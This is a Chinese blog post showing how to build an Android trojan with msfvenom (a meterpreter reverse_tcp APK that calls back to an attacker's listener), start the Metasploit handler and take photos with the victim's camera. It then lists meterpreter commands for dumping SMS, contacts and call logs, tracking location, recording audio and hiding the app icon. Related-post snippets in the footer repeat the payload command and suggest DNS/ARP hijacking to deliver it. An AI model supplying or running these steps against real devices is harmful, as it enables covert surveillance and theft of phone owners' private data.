kali系统渗透android

已于 2022-12-25 17:21:49 修改
阅读量765 收藏 18
点赞数
分类专栏: Kali 文章标签: android
于 2022-12-25 17:07:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_37137902/article/details/128436371
版权

生成木马

msfvenom -p android/meterpreter/reverse_tcp lhost="192.168.1.8" lport=5000 R > /root/payload.apk

 运行msfconsole

msfconsole
use exploit/multi/handler

设置配置并启动

set payload android/meterpreter/reverse_tcp
set LhOST 192.168.1.8
set lport 5000
run

 拍照

webcam_snap

附命令

===========

    Command                   Description
    -------                   -----------
    ?                         Help menu
    background                Backgrounds the current session
    bg                        Alias for background
    bgkill                    Kills a background meterpreter script
    bglist                    Lists running background scripts
    bgrun                     Executes a meterpreter script as a background thread
    channel                   Displays information or control active channels
    close                     Closes a channel
    detach                    Detach the meterpreter session (for http/https)
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit                      Terminate the meterpreter session
    get_timeouts              Get the current session timeout values
    guid                      Get the session GUID
    help                      Help menu
    info                      Displays information about a Post module
    irb                       Open an interactive Ruby shell on the current session
    load                      Load one or more meterpreter extensions
    machine_id                Get the MSF ID of the machine attached to the session
    pry                       Open the Pry debugger on the current session
    quit                      Terminate the meterpreter session
    read                      Reads data from a channel
    resource                  Run the commands stored in a file
    run                       Executes a meterpreter script or Post module
    secure                    (Re)Negotiate TLV packet encryption on the session
    sessions                  Quickly switch to another session
    set_timeouts              Set the current session timeout values
    sleep                     Force Meterpreter to go quiet, then re-establish session
    transport                 Manage the transport mechanisms
    use                       Deprecated alias for "load"
    uuid                      Get the UUID for the current session
    write                     Writes data to a channel


Stdapi: File system Commands
============================

    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    checksum      Retrieve the checksum of a file
    cp            Copy source to destination
    del           Delete the specified file
    dir           List files (alias for ls)
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcat          Read the contents of a local file to the screen
    lcd           Change local working directory
    lls           List local files
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    mv            Move source to destination
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    search        Search for files
    upload        Upload a file or directory


Stdapi: Networking Commands
===========================

    Command       Description
    -------       -----------
    ifconfig      Display interfaces
    ipconfig      Display interfaces
    portfwd       Forward a local port to a remote service
    route         View and modify the routing table


Stdapi: System Commands
=======================

    Command       Description
    -------       -----------
    execute       Execute a command
    getenv        Get one or more environment variable values
    getpid        Get the current process identifier
    getuid        Get the user that the server is running as
    localtime     Displays the target system local date and time
    pgrep         Filter processes by name
    ps            List running processes
    shell         Drop into a system command shell
    sysinfo       Gets information about the remote system, such as OS


Stdapi: User interface Commands
===============================

    Command       Description
    -------       -----------
    screenshare   Watch the remote user desktop in real time
    screenshot    Grab a screenshot of the interactive desktop


Stdapi: Webcam Commands
=======================

    Command        Description
    -------        -----------
    record_mic     Record audio from the default microphone for X seconds
    webcam_chat    Start a video chat
    webcam_list    List webcams
    webcam_snap    Take a snapshot from the specified webcam
    webcam_stream  Play a video stream from the specified webcam


Stdapi: Audio Output Commands
=============================

    Command       Description
    -------       -----------
    play          play a waveform audio file (.wav) on the target system


Android Commands
================

    Command           Description
    -------           -----------
    activity_start    Start an Android activity from a Uri string
    check_root        Check if device is rooted
    dump_calllog      Get call log
    dump_contacts     Get contacts list
    dump_sms          Get sms messages
    geolocate         Get current lat-long using geolocation
    hide_app_icon     Hide the app icon from the launcher
    interval_collect  Manage interval collection capabilities
    send_sms          Sends SMS from target session
    set_audio_mode    Set Ringer Mode
    sqlite_query      Query a SQLite database from storage
    wakelock          Enable/Disable Wakelock
    wlan_geolocate    Get current lat-long using WLAN information


Application Controller Commands
===============================

    Command        Description
    -------        -----------
    app_install    Request to install apk file
    app_list       List installed apps in the device
    app_run        Start Main Activty for package name
    app_uninstall  Request to uninstall application

Chasmれ
关注
  • 0
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
基于Android设备的Kali Linux渗透测试教程1
06-13
基于Android设备的Kali Linux渗透测试教程1,基于Android设备的Kali Linux渗透测试教程1
安卓逆向学习及APK抓包(一)【Kali】安装 Scrcpy 进行手机投屏
szgyunyun的博客
02-28 1219
官方给出的安装方式,但是经过各种换源操作啥的依然报错┌──(root㉿kali) - [ ~/桌面 ] └─ # apt install scrcpy 正在读取软件包列表 .. . 完成正在分析软件包的依赖关系树 .. . 完成正在读取状态信息 .. . 完成E: 无法定位软件包 scrcpy。
kali 系列学习08-安卓逆向
weixin_30376509的博客
06-18 668
可以轻松把安卓apk的源码逆向出来,逆向有什么用,比如手机apk木马,可以用于追踪黑客,详见 https://cloud.tencent.com/developer/news/179336 用2个工具组合,分别处理 apk 和 dex 两类文件,最终得到 jar 文件 一、apktool 逆向,在/usr/share/apktool中生成相应的目录文件 root@kali:/u...
Kali Linux进行移动应用安全测试
沐尘而生的博客
08-29 341
在案例中,使用MobSF工具在Kali Linux中对一个Android应用进行了安全分析和漏洞测试。通过安装和运行MobSF,我们上传了应用的APK文件进行分析。然后在MobSF界面中查看了应用的漏洞报告和分析结果,以识别潜在的安全问题。这个案例仅仅展示了使用MobSF工具的基本流程,实际的移动应用安全测试可能涉及更多工具和技术,如代码审查、渗透测试等。
kali linux逆向apk,Kali Linux 逆向工程工具 d2j-dex2ja 教程
weixin_34638021的博客
05-26 1606
日期:2017年12月20日观看: 1,309 °C 次d2j-dex2jar是一款针对安卓,将dex转换为jar的工具。什么是dex文件?dex文件是Android平台上可执行文件的类型。对于Android DEX文件进行优化,需要注意的一点是DEX文件的结构是紧凑的,但是我们还是要想方设法的进行提高程序的运行速度,我们就仍然需要对DEX文件进行进一步优化。调整所有字段的字节序(LITTLE_...
Msf--控制 Android手机
2022年7月6日从博客园https://www.cnblogs.com/hugboy/ 学习记录博客。
08-02 1190
|>>>中华人民共和国网络安全法<<<|警告:请勿用于非法用途,后果自负! 0.环境 虚拟机 KaliLinux 手机 Redmi 6A 同一局域网下 1.查看控制端IP ifconfig 即192.168.xx.xxx 2.生成木马程序 >>>msfvenom -p android/meterpreter/reverse_tcp lh...
kali完成一次android渗透测试
weixin_51715176的博客
05-05 2278
一次简单的渗透测试
Kali Linux Windows渗透教程从0到解决思路。
sunwanfulove的博客
09-22 2180
Kali Linux Windows渗透教程从0到解决思路成为安全工程师必备技能。
Kali利用MSF渗透安卓手机
weixin_51641247的博客
03-29 4716
利用Kali渗透安卓手机; MSF是一个综合性渗透测试工具,集成信息收集、漏洞扫描、漏洞利用以及提权等功能的工具
MSF入侵安卓手机
2301_77162959的博客
07-11 1035
里边安装了许许多多的工具。其中MSF就自带有。MSF是Metasploit的简称,Metasploit是一款开源的安全漏洞检测工具,非常强大,分别有Windows版和Linux版,工具里集成了许多微软公布的漏洞(0day)。现在要做的就是把木马文件搞到人家的手机上,思路有很多 可以DNS arp劫持欺骗 只要对方用手机下载文件 就会下载我们的木马文件。这样我们就在/root/路径下生成了一个APK的安卓木马文件,至于木马的免杀暂且不谈。还有社工什么等等的,这里我就简单的把木马文件弄我自己的手机上做测试。
基于Android设备的Kali Linux渗透测试基础
08-02
基于Android设备的Kali Linux渗透测试教程基于Android设备的Kali Linux渗透测试教程基于Android设备的Kali Linux渗透测试教程
android-pentest-tool:适用于Kali Linux的Android渗透测试工具
05-01
专为kali linux设计 javaFX + Spring boot + bash脚本 一键完成所有常规步骤 更新 1.0版发布了! 建造 mvn clean package 跑步 java -jar target/android-pentest-tool*.jar 去做: 添加安装步骤 添加功能列表 更...
Android_Pentest_Tools:适用于Kali Linux的Android渗透测试工具
05-01
Android Pentest工具 专为kali linux设计javaFX + Spring boot + bash脚本一键完成所有常规步骤更新1.0版发布了!建造mvn clean package跑步java -jar target/android-pentest-tool*.jar去做: 添加安装步骤添加功能...
Kali Linux NetHunter基础教程.pdf
12-02
Kali Linux NetHunter 是一款基于 Android 设备构建的渗透测试平台。包括一些特殊和独特的功能。 NetHunter 支持无线 802.11 注入、一键 MANA AP 搭建
Android --- 英文单引号用&apos;替换报错:does not contain a valid string resource
梁同学与Android
04-23 214
Android --- 英文单引号用&apos;替换报错:does not contain a valid string resource
Android 14 transtion 动画流程
u012627628的博客
04-24 955
implements Transitions.TransitionHandler 的对象都会调用到startAnimation。根据上步计算出来的sortedTargets计算要做的动画TransitionInfo。此列表在开始做动画时候会判断里面的key,value是否满足做动画的条件。将符合条件的changeInfo添加到targets 返回。计算所有的到mChanges。
安卓aab文件生成apk文件
最新发布
ma15991375491的博客
04-24 363
比如我们在手机上经常下载的的各种APP,其实一个Android应用程序的代码想要在Android设备上运行,必须先进行编译,然后被打包成为一个被Android系统所能识别的文件才可以被运行,而这种能被Android系统识别并运行的文件格式便是“APK”。一个APK文件内包含被编译的代码文件(.dex 文件),文件资源(resources), 原生资源文件(assets),证书(certificates),和清单文件(manifest file)严格来说,两者没有什么区别,后者是前者的一种升级版格式文件。
Android Native Hook: 原理、方案对比与具体实现
陆业聪
04-21 930
本文探讨了Android Native Hook技术,包括原理、实现方式(Inline Hook和PLT/GOT Hook)及优化建议,旨在帮助开发者更有效地应用该技术。
bugku ezbypass
m_de_g的博客
04-23 224
bugku ezbypass $++,$_++
kali渗透android
02-04
Kali Linux是一款专门用于渗透测试和网络安全的操作系统。它提供了丰富的工具和资源,用于评估和测试网络的安全性。在Kali Linux中,你可以使用各种工具来渗透测试Android设备。 渗透测试Android设备的目的是评估设备的安全性,并发现可能存在的漏洞和弱点。以下是一些常用的Kali Linux工具和技术,可以用于渗透测试Android设备: 1. Metasploit:Metasploit是一款强大的渗透测试框架,它提供了各种模块和工具,用于发现和利用安全漏洞。你可以使用Metasploit来执行针对Android设备的攻击。 2. ADB(Android Debug Bridge):ADB是Android开发工具包中的一个命令行工具,它允许你与Android设备进行通信和控制。你可以使用ADB来获取设备的信息、安装应用程序、执行命令等。 3. APK反编译:Kali Linux中有一些工具可以帮助你反编译Android应用程序(APK文件),以便分析其代码和结构。例如,apktool和dex2jar是两个常用的工具,可以将APK文件转换为可读的源代码。 4. 漏洞扫描器:Kali Linux中有一些漏洞扫描器,可以用于扫描Android设备上的漏洞和弱点。例如,Nessus和OpenVAS是两个常用的漏洞扫描工具,可以帮助你发现设备上可能存在的安全问题。 5. 社会工程学:社会工程学是一种通过欺骗和操纵人类行为来获取信息的技术。在渗透测试中,你可以使用社会工程学技术来诱使用户执行恶意操作或泄露敏感信息。 需要注意的是,渗透测试是一项合法的活动,但在进行任何渗透测试之前,请确保你已经获得了合法的授权,并遵守相关法律和道德规范。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值